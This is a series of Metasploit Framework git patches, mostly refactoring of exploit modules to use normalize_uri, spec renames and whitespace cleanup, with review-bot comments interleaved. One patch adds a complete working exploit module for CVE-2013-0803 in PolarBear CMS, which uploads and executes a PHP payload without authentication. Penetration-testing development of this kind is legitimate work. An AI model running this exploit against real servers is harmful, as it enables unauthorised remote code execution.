@@ -210,30 +212,30 @@ describe Rex::Proto::Http::Client do end it "should respond to its various accessors" do - cli.should respond_to :config - cli.should respond_to :config_types - cli.should respond_to :pipeline - cli.should respond_to :local_host - cli.should respond_to :local_port - cli.should respond_to :conn - cli.should respond_to :context - cli.should respond_to :proxies - # cli.should respond_to :username - # cli.should respond_to :password - cli.should respond_to :junk_pipeline + @cli.should respond_to :config + @cli.should respond_to :config_types + @cli.should respond_to :pipeline + @cli.should respond_to :local_host + @cli.should respond_to :local_port + @cli.should respond_to :conn + @cli.should respond_to :context + @cli.should respond_to :proxies + # @cli.should respond_to :username + # @cli.should respond_to :password + @cli.should respond_to :junk_pipeline # These are supposed to be protected - cli.should respond_to :ssl - cli.should respond_to :ssl_version - cli.should respond_to :hostname - cli.should respond_to :port + @cli.should respond_to :ssl + @cli.should respond_to :ssl_version + @cli.should respond_to :hostname + @cli.should respond_to :port end # Not super sure why these are protected... it "should refuse access to its protected accessors" do - expect {cli.ssl}.to raise_error NoMethodError - expect {cli.ssl_version}.to raise_error NoMethodError - expect {cli.hostname}.to raise_error NoMethodError - expect {cli.port}.to raise_error NoMethodError + expect {@cli.ssl}.to raise_error NoMethodError + expect {@cli.ssl_version}.to raise_error NoMethodError + expect {@cli.hostname}.to raise_error NoMethodError + expect {@cli.port}.to raise_error NoMethodError end end From 0421cff9139c39a4b0ad5e484dcbcba91c609c8f Mon Sep 17 00:00:00 2001 
From: Tasos Laskos Date: Mon, 25 Feb 2013 19:49:39 +0200 Subject: [PATCH 075/139] Exploit::Remote::Web#perform_request: timeout set to 10 --- lib/msf/core/exploit/web.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index dcec407024..917cdf73fa 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -99,7 +99,7 @@ module Exploit::Remote::Web 'vars_post' => post, 'headers' => headers, 'cookie' => cookies - }, 0.01 ) + }, 10 ) end # From 52241b847a045e6d7816d75cbc1b84ff38333c2a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 12:20:37 -0600 Subject: [PATCH 076/139] Uses normalize_uri instead of manually adding a slash --- modules/exploits/multi/http/glossword_upload_exec.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 32fe7f9b43..57b069ceb9 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote def check base = target_uri.path - base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" user = datastore['USERNAME'] pass = datastore['PASSWORD'] @@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}gw_admin.php", + 'uri' => normalize_uri(base, 'gw_admin.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post, }) @@ -117,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}gw_login.php", + 'uri' => normalize_uri(base, 'gw_login.php'), 'data' => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter" }) return res 
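Review bot: The request timeout in `perform_request` changes from `0.01` to a bare `10` with no name or comment, so a reader cannot tell whether ten seconds is a measured value or a guess, and there is no way to tune it per run. Consider `}, REQUEST_TIMEOUT )` with a documented constant in the module, or reading the value from a datastore option if the mixin already exposes one. `perform_request` begins and ends outside the hunk.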
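Review bot: The login request in the `@@ -117,7 +116,7 @@` hunk still builds its body by interpolating `user` and `pass` straight into the `'data'` string, so a password containing `&`, `%`, `+` or `=` produces a malformed or truncated form body even though the URI now goes through `normalize_uri`. Replacing that line with `'vars_post' => { 'arPost[user_name]' => user, 'arPost[user_pass]' => pass, 'arPost[locale_name]' => 'en-utf8', 'a' => 'login', 'sid' => '', 'post' => 'Enter' }` lets `send_request_cgi` encode each value. The enclosing method begins outside the hunk.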
@@ -127,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" @fname= rand_text_alphanumeric(rand(10)+6) + '.php' user = datastore['USERNAME'] @@ -163,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}gw_admin.php?a=edit-own&t=users", + 'uri' => normalize_uri(base, 'gw_admin.php?a=edit-own&t=users'), 'cookie' => "sid#{token}=#{sid}" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout @@ -182,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote begin send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}#{shell_uri}", + 'uri' => normalize_uri(base, shell_uri), }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") From 904a69ba63bd6aae0065bef4150a9283d8a35c9b Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 25 Feb 2013 13:02:03 -0600 Subject: [PATCH 077/139] Move xor tests to the right filenames Thanks, simplecov, for telling me that these weren't actually getting run. --- spec/lib/rex/encoding/xor/{byte.rb => byte_spec.rb} | 0 spec/lib/rex/encoding/xor/{dword.rb => dword_spec.rb} | 0 spec/lib/rex/encoding/xor/{qword.rb => qword_spec.rb} | 0 spec/lib/rex/encoding/xor/{word.rb => word_spec.rb} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename spec/lib/rex/encoding/xor/{byte.rb => byte_spec.rb} (100%) rename spec/lib/rex/encoding/xor/{dword.rb => dword_spec.rb} (100%) rename spec/lib/rex/encoding/xor/{qword.rb => qword_spec.rb} (100%) rename spec/lib/rex/encoding/xor/{word.rb => word_spec.rb} (100%) diff --git a/spec/lib/rex/encoding/xor/byte.rb b/spec/lib/rex/encoding/xor/byte_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/byte.rb rename to spec/lib/rex/encoding/xor/byte_spec.rb 
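Review bot: `normalize_uri(base, 'gw_admin.php?a=edit-own&t=users')` in the `@@ -163,7 +161,7 @@` hunk pushes a query string through a path normaliser; any future escaping or slash handling inside `normalize_uri` would silently corrupt the `?a=...&t=...` part, and it hides the parameters from readers. Use `'uri' => normalize_uri(base, 'gw_admin.php'),` together with `'vars_get' => { 'a' => 'edit-own', 't' => 'users' },` so the query is encoded by `send_request_cgi` like the other requests in this file. The `exploit` method continues outside the hunk.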
diff --git a/spec/lib/rex/encoding/xor/dword.rb b/spec/lib/rex/encoding/xor/dword_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/dword.rb rename to spec/lib/rex/encoding/xor/dword_spec.rb diff --git a/spec/lib/rex/encoding/xor/qword.rb b/spec/lib/rex/encoding/xor/qword_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/qword.rb rename to spec/lib/rex/encoding/xor/qword_spec.rb diff --git a/spec/lib/rex/encoding/xor/word.rb b/spec/lib/rex/encoding/xor/word_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/word.rb rename to spec/lib/rex/encoding/xor/word_spec.rb From 690e7ec8a781984f4cee1a5a928281df4a54beff Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 13:28:00 -0600 Subject: [PATCH 078/139] Uses normalize_uri --- modules/exploits/multi/http/kordil-edms-upload-exec.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil-edms-upload-exec.rb index d4caccb78b..f680d527e3 100644 --- a/modules/exploits/multi/http/kordil-edms-upload-exec.rb +++ b/modules/exploits/multi/http/kordil-edms-upload-exec.rb @@ -49,14 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote def check base = target_uri.path - base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" # retrieve software version from login page begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}global_group_login.php" + 'uri' => normalize_uri(base, 'global_group_login.php') }) if res and res.code == 200 if res.body =~ /
Kordil EDMS v2\.2\.60/ @@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}users_add.php", + 'uri' => normalize_uri(base, 'users_add.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post }) @@ -104,7 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" @fname = rand_text_numeric(7) @@ -127,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}userpictures/#{@fname}.php" + 'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") From f3f913edc5bb871ec62908c3723b6a37eb477723 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 13:29:27 -0600 Subject: [PATCH 079/139] Correct bad naming style --- .../{kordil-edms-upload-exec.rb => kordil_edms_upload_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/multi/http/{kordil-edms-upload-exec.rb => kordil_edms_upload_exec.rb} (100%) diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb similarity index 100% rename from modules/exploits/multi/http/kordil-edms-upload-exec.rb rename to modules/exploits/multi/http/kordil_edms_upload_exec.rb From cae19399140a86ef55dbbcb7d0d1c07abc10b060 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 13:44:11 -0600 Subject: [PATCH 080/139] Kinda too long --- modules/auxiliary/gather/xbmc_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index c55c8034d5..3f03554c15 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb 
+++ b/modules/auxiliary/gather/xbmc_traversal.rb
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
 super(update_info(info,
 'Name' => "XBMC Web Server Directory Traversal",
 'Description' => %q{
- This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build.
- The module can only be used to retrieve files.
+ This module exploits a directory traversal bug in XBMC 11, up until the
+ 2012-11-04 nightly build. The module can only be used to retrieve files.
 },
 'License' => MSF_LICENSE,
 'Author' =>
From 1ed74b46becba32d01392d03b50aacc02b2d0e9d Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Mon, 25 Feb 2013 14:14:57 -0600
Subject: [PATCH 081/139] Add CVE-2013-0803
From: http://dev.metasploit.com/redmine/issues/7691
---
 .../multi/http/polarcms_upload_exec.rb | 106 ++++++++++++++++++
 1 file changed, 106 insertions(+)
 create mode 100644 modules/exploits/multi/http/polarcms_upload_exec.rb
diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb
new file mode 100644
index 0000000000..41cc4f750b
--- /dev/null
+++ b/modules/exploits/multi/http/polarcms_upload_exec.rb
@@ -0,0 +1,106 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/exploit/php_exe'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::PhpEXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PolarPearCms PHP File Upload Vulnerability',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability found in PlarPear CMS
+ By abusing the upload.php file, a malicious user can upload a file to a temp
+ directory without authentication, which results in arbitrary code execution.
+ },
+ 'Author' =>
+ [
+ 'Fady Mohamed Osman <@Fady_Osman>'
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', 'CVE-2013-0803' ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ },
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'JAN 21 2012'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The full URI path to Polarbearcms', '/polarbearcms']) ,
+ OptString.new('UPLOADDIR', [true, 'The directory to upload to starting from web root. 
This should be writable', '/polarbearcms'])
+ ], self.class)
+ end
+
+ def check
+ uri = target_uri.path
+ uri << '/' if uri[-1,1] != '/'
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{uri}includes/jquery.uploadify/upload.php"
+ })
+
+ if not res or res.code != 200
+ return Exploit::CheckCode::Unknown
+ end
+
+ return Exploit::CheckCode::Appears
+ end
+
+ def exploit
+ uri = target_uri.path
+ uri << '/' if uri[-1,1] != '/'
+
+ upload_dir = datastore['UPLOADDIR']
+ upload_dir << '/' if upload_dir[-1,1] != '/'
+
+ peer = "#{rhost}:#{rport}"
+
+ @payload_name = "#{rand_text_alpha(5)}.php"
+ php_payload = get_write_exec_payload(:unlink_self=>true)
+
+ data = Rex::MIME::Message.new
+ data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
+ data.add_part("#{uri}includes/jquery.uploadify/", nil, nil, "form-data; name=\"folder\"")
+ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+ print_status("#{peer} - Uploading payload #{@payload_name}")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "#{uri}includes/jquery.uploadify/upload.php?folder=#{upload_dir}",
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data
+ })
+ if not res or res.code != 200
+ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ end
+
+ upload_uri = "#{upload_dir}#{@payload_name}"
+ print_status("#{peer} - Executing payload #{@payload_name}")
+ res = send_request_raw({
+ 'uri' => upload_uri,
+ 'method' => 'GET'
+ })
+ end
+end
From 1ce86b7adb34e8d35b5ca72a670f62867961921e Mon Sep 17 00:00:00 2001
From: James Lee
Date: Mon, 25 Feb 2013 14:29:10 -0600
Subject: [PATCH 082/139] Whitespace
---
 lib/rex/proto/http/client.rb | 8 ++++----
 lib/rex/proto/http/client_request.rb | 6 +++---
 modules/auxiliary/scanner/http/http_login.rb | 4 ++--
 spec/lib/rex/proto/http/client_spec.rb | 2 +-
 4 files changed, 10 insertions(+), 10 deletions(-)
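Review bot: `upload_dir << '/'` appends to the string object returned by `datastore['UPLOADDIR']` (and `uri << '/'` appears to do the same to whatever `target_uri.path` returns), so the module mutates shared option state on each run instead of working on a copy; the other commits in this series moved to `normalize_uri` for exactly this join, e.g. `'uri' => normalize_uri(target_uri.path, 'includes', 'jquery.uploadify', 'upload.php')` in `check`, and the upload and trigger requests in `exploit` should be built the same way. The final `res = send_request_raw(...)` is never inspected, so a failed trigger request ends the module right after a status line saying the payload is being executed. The product is spelled three ways in this file, `PolarPearCms` in `Name`, `PlarPear CMS` in `Description` and `Polarbearcms` in the option text; pick one.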
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..b2962369ca 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,7 +169,7 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] + opts['agent'] ||= config['agent'] opts['data'] ||= '' opts['uri'] ||= '/' opts['cookie'] ||= config['cookie'] @@ -179,7 +179,7 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -221,12 +221,12 @@ class Client opts['ctype'] ||= 'application/x-www-form-urlencoded' opts['vars_get'] ||= {} opts['vars_post'] ||= {} - + opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' + opts['version'] = opts['version'] || config['version'] || '1.1' opts['client_config'] = self.config diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..d307453b40 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -118,9 +118,9 @@ class ClientRequest if encode req << set_encode_uri(uri_str) else - req << uri_str + req << uri_str end - + if (qstr.length > 0) req << '?' @@ -456,4 +456,4 @@ end end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 4324e312f2..40446f68db 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb 
@@ -116,10 +116,10 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - + response = do_http_login(user,pass) result = determine_result(response) - + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb
index 28cb3bb245..937130a1f4 100644
--- a/spec/lib/rex/proto/http/client_spec.rb
+++ b/spec/lib/rex/proto/http/client_spec.rb
@@ -132,7 +132,7 @@ describe Rex::Proto::Http::Client do # These set_ methods all exercise the evasion opts, looks like it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - + end it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do
From b6458d2bfa54fa33801da1f62e418ba000e45477 Mon Sep 17 00:00:00 2001
From: Brandon Turner
Date: Wed, 23 Jan 2013 21:48:53 -0600
Subject: [PATCH 083/139] Update MDM gem in gemcache
---
 .../app/models/mdm/cred_file.rb | 8 --------
 .../.gitignore | 0
 .../.rspec | 0
 .../Gemfile | 0
 .../LICENSE | 2 +-
 .../README.md | 0
 .../Rakefile | 0
 .../app/models/mdm/api_key.rb | 0
 .../app/models/mdm/client.rb | 0
 .../app/models/mdm/cred.rb | 0
 .../app/models/mdm/event.rb | 0
 .../app/models/mdm/exploit_attempt.rb | 0
 .../app/models/mdm/exploited_host.rb | 0
 .../app/models/mdm/host.rb | 0
 .../app/models/mdm/host_detail.rb | 0
 .../app/models/mdm/host_tag.rb | 0
 .../app/models/mdm/imported_cred.rb | 0
 .../app/models/mdm/listener.rb | 0
 .../app/models/mdm/loot.rb | 0
 .../app/models/mdm/macro.rb | 0
 .../app/models/mdm/mod_ref.rb | 0
 .../app/models/mdm/module_action.rb | 0
 .../app/models/mdm/module_arch.rb | 0
 .../app/models/mdm/module_author.rb | 0
 .../app/models/mdm/module_detail.rb | 0
 .../app/models/mdm/module_mixin.rb | 0
 .../app/models/mdm/module_platform.rb | 0
 .../app/models/mdm/module_ref.rb | 0
 .../app/models/mdm/module_target.rb | 0
 .../app/models/mdm/nexpose_console.rb | 0
 .../app/models/mdm/note.rb | 0
 .../app/models/mdm/profile.rb | 0
 .../app/models/mdm/ref.rb | 0
 .../app/models/mdm/report.rb | 0
 .../app/models/mdm/report_template.rb | 0
 .../app/models/mdm/route.rb | 0
 .../app/models/mdm/service.rb | 0
 .../app/models/mdm/session.rb | 0
 .../app/models/mdm/session_event.rb | 0
 .../app/models/mdm/tag.rb | 0
 .../app/models/mdm/task.rb | 0
 .../app/models/mdm/user.rb | 0
 .../app/models/mdm/vuln.rb | 0
 .../app/models/mdm/vuln_attempt.rb | 0
 .../app/models/mdm/vuln_detail.rb | 0
 .../app/models/mdm/vuln_ref.rb | 0
 .../app/models/mdm/web_form.rb | 0
 .../app/models/mdm/web_page.rb | 0
 .../app/models/mdm/web_site.rb | 0
 .../app/models/mdm/web_vuln.rb | 0
 .../app/models/mdm/wmap_request.rb | 0
 .../app/models/mdm/wmap_target.rb | 0
 .../app/models/mdm/workspace.rb | 1 -
 .../bin/mdm_console | 0
 .../console_db.yml | 0
 .../lib/mdm.rb | 0
 .../lib/mdm/host/operating_system_normalization.rb | 0
 .../lib/metasploit_data_models.rb | 0
 .../lib/metasploit_data_models/base64_serializer.rb | 0
 .../lib/metasploit_data_models/engine.rb | 0
 .../lib/metasploit_data_models/serialized_prefs.rb | 0
 .../validators/ip_format_validator.rb | 0
 .../validators/password_is_strong_validator.rb | 0
 .../lib/metasploit_data_models/version.rb | 2 +-
 .../metasploit_data_models.gemspec | 2 +-
 .../script/rails | 0
 .../spec/dummy/Rakefile | 0
 .../spec/dummy/app/assets/javascripts/application.js | 0
 .../spec/dummy/app/assets/stylesheets/application.css | 0
 .../spec/dummy/app/controllers/application_controller.rb | 0
 .../spec/dummy/app/helpers/application_helper.rb | 0
 .../spec/dummy/app/mailers/.gitkeep | 0
 .../spec/dummy/app/models/.gitkeep | 0
 .../spec/dummy/app/views/layouts/application.html.erb | 0
 .../spec/dummy/config.ru | 0
 .../spec/dummy/config/application.rb | 0
 .../spec/dummy/config/boot.rb | 0
 .../spec/dummy/config/database.yml.example | 0
 .../spec/dummy/config/environment.rb | 0
 .../spec/dummy/config/environments/development.rb | 0
 .../spec/dummy/config/environments/production.rb | 0
 .../spec/dummy/config/environments/test.rb | 0
 .../spec/dummy/config/initializers/backtrace_silencers.rb | 0
 .../spec/dummy/config/initializers/inflections.rb | 0
 .../spec/dummy/config/initializers/mime_types.rb | 0
 .../spec/dummy/config/initializers/secret_token.rb | 0
 .../spec/dummy/config/initializers/session_store.rb | 0
 .../spec/dummy/config/initializers/wrap_parameters.rb | 0
 .../spec/dummy/config/routes.rb | 0
 .../spec/dummy/lib/assets/.gitkeep | 0
 .../spec/dummy/log/.gitkeep | 0
 .../spec/dummy/public/404.html | 0
 .../spec/dummy/public/422.html | 0
 .../spec/dummy/public/500.html | 0
 .../spec/dummy/public/favicon.ico | 0
 .../spec/dummy/script/rails | 0
 .../spec/lib/base64_serializer_spec.rb | 0
 .../spec/spec_helper.rb | 0
 98 files changed, 3 insertions(+), 12 deletions(-)
 delete mode 100755
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/.gitignore (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/.rspec (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/Gemfile (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/LICENSE (97%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/README.md (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/Rakefile (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/api_key.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/client.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/cred.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/event.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/exploit_attempt.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/exploited_host.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/host.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/host_detail.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/host_tag.rb (100%)
 rename
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/imported_cred.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/listener.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/loot.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/macro.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/mod_ref.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_action.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_arch.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_author.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_detail.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_mixin.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_platform.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_ref.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_target.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/nexpose_console.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 =>
metasploit_data_models-0.4.0}/app/models/mdm/note.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/profile.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/ref.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/report.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/report_template.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/route.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/service.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/session.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/session_event.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/tag.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/task.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/user.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln_attempt.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln_detail.rb (100%)
